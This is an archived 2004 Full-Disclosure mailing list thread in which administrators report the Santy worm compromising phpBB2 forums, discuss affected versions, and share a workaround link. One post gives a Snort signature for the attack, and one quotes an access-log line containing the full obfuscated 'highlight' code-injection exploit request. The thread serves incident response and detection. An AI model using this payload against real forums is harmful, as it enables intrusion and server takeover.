[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] RE: Worm hitting PHPbb2 Forums

To: <incidents@xxxxxxxxxxxxxxxxx>, clamav-milter@xxxxxxxxxxxxxxxxxxxxxxx, version@xxxxxxxxxxxxxxxxxxxxxxx, 0.71@xxxxxxxxxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] RE: Worm hitting PHPbb2 Forums
From: "Mattias R. Lindgren" <mailinglists@xxxxxxxxxxxxxxxxxxx>
Date: Wed, 22 Dec 2004 22:51:40 -0700

There is a workaround posted http://forums.ir0x0rz.com/viewtopic.php?t=34

I'm hoping this will be enough to protect phpBB installs.

~M

-----Original Message-----
From: M. Shirk [mailto:shirkdog_list@xxxxxxxxxxx] 
Sent: Tuesday, December 21, 2004 5:53 PM
To: incidents@xxxxxxxxxxxxxxxxx
Cc: full-disclosure@xxxxxxxxxxxxxxxx
Subject: RE: Worm hitting PHPbb2 Forums

I missed an important "F" on my previous post for these snort sigs.

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE 
phpBB Highlighting Code Execution - Santy.A Worm"; 
flow:to_server,established; uricontent:"/viewtopic.php?"; nocase; 
uricontent:"&highlight='.fwrite(fopen("; nocase; 
reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999; 
rev:1;)

Shirkdog
http://www.shirkdog.us



>From: "Mike" <mike_sha@xxxxxxx>
>To: <mark@xxxxxxxxx>, "L. Walker" <lwalker@xxxxxxxxxxx>
>CC: <incidents@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
>Subject: RE: Worm hitting PHPbb2 Forums
>Date: Tue, 21 Dec 2004 13:28:27 -0500
>
>Does this affect PHPBB2 in general, or is it platform specific as well?
>
>Mike Fetherston
>
> > -----Original Message-----
> > From: mark@xxxxxxxxx [mailto:mark@xxxxxxxxx]
> > Sent: Tuesday, December 21, 2004 12:47 PM
> > To: L. Walker
> > Cc: incidents@xxxxxxxxxxxxxxxxx; full-disclosure@xxxxxxxxxxxxxxxx
> > Subject: Re: Worm hitting PHPbb2 Forums
> >
> > Front what I have read, this can happen in any phpbb version lower
>than
> > 2.0.11
> >
> > This exploit is becoming frequent.  Normally uploading a ddos bot.
> >
> > Mark
> >
> > Quoting "L. Walker" <lwalker@xxxxxxxxxxx>:
> >
> > > Just spotted two clients hit by this.  One client didnt update his
> > > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation
>16.
> > > Chkrootkit says its Adore, however could be something else.
>Datacenter
> > > wasn't very smart and has since wiped the server, so no binaries or
> > other
> > > evidence.
> > >
> > > Generation 12 only wiped out PHP files, replacing them with its own
> > > message on other client's PHPbb2 forum.  Access logs show:
> > >
> > > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> > >
> >
>/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlig
>ht
> >
>=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252ech
>r(
> >
>32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252ech
>r(
> >
>112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252ec
>hr
> >
>(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252ec
>hr
> >
>(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252
>ec
> >
>hr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252
>ec
> >
>hr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%
>25
> >
>2echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%
>25
> >
>2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106
>)%
> >
>252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78
>)%
> > 252echr(41)%252echr(34))%252e%2527
> > > HTTP/1.0" 200 270
> > >
> >
>"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5
>ac
> >
>a2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252ech
>r(
> >
>114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252ec
>hr
> >
>(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252
>ec
> >
>hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252e
>ch
> >
>r(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252
>ec
> >
>hr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%25
>2e
> >
>chr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)
>%2
> >
>52echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)
>%2
> >
>52echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(12
>2)
> >
>%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(9
>7)
> > %252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
> > > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> > >
> > > --
> > > L. Walker <lwalker at magi dot net dot au>
> > > Network Administrator / Consultant
> > > --
> > >
> >
> >
> >
> >
> > ----------------------------------------------------------------
> > This message was sent using IMP, the Internet Messaging Program.
>

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

Attachment: smime.p7s
Description: S/MIME cryptographic signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: RE: [Full-Disclosure] RE: Worm hitting PHPbb2 Forums
Next by Date: [Full-Disclosure] Re: eDonkey Hub version 16.50 vunerability?
Previous by thread: [Full-Disclosure] RE: Worm hitting PHPbb2 Forums
Next by thread: [Full-Disclosure] Re: Full-Disclosure Digest, Vol 1, Issue 2120
Index(es):
- Date
- Thread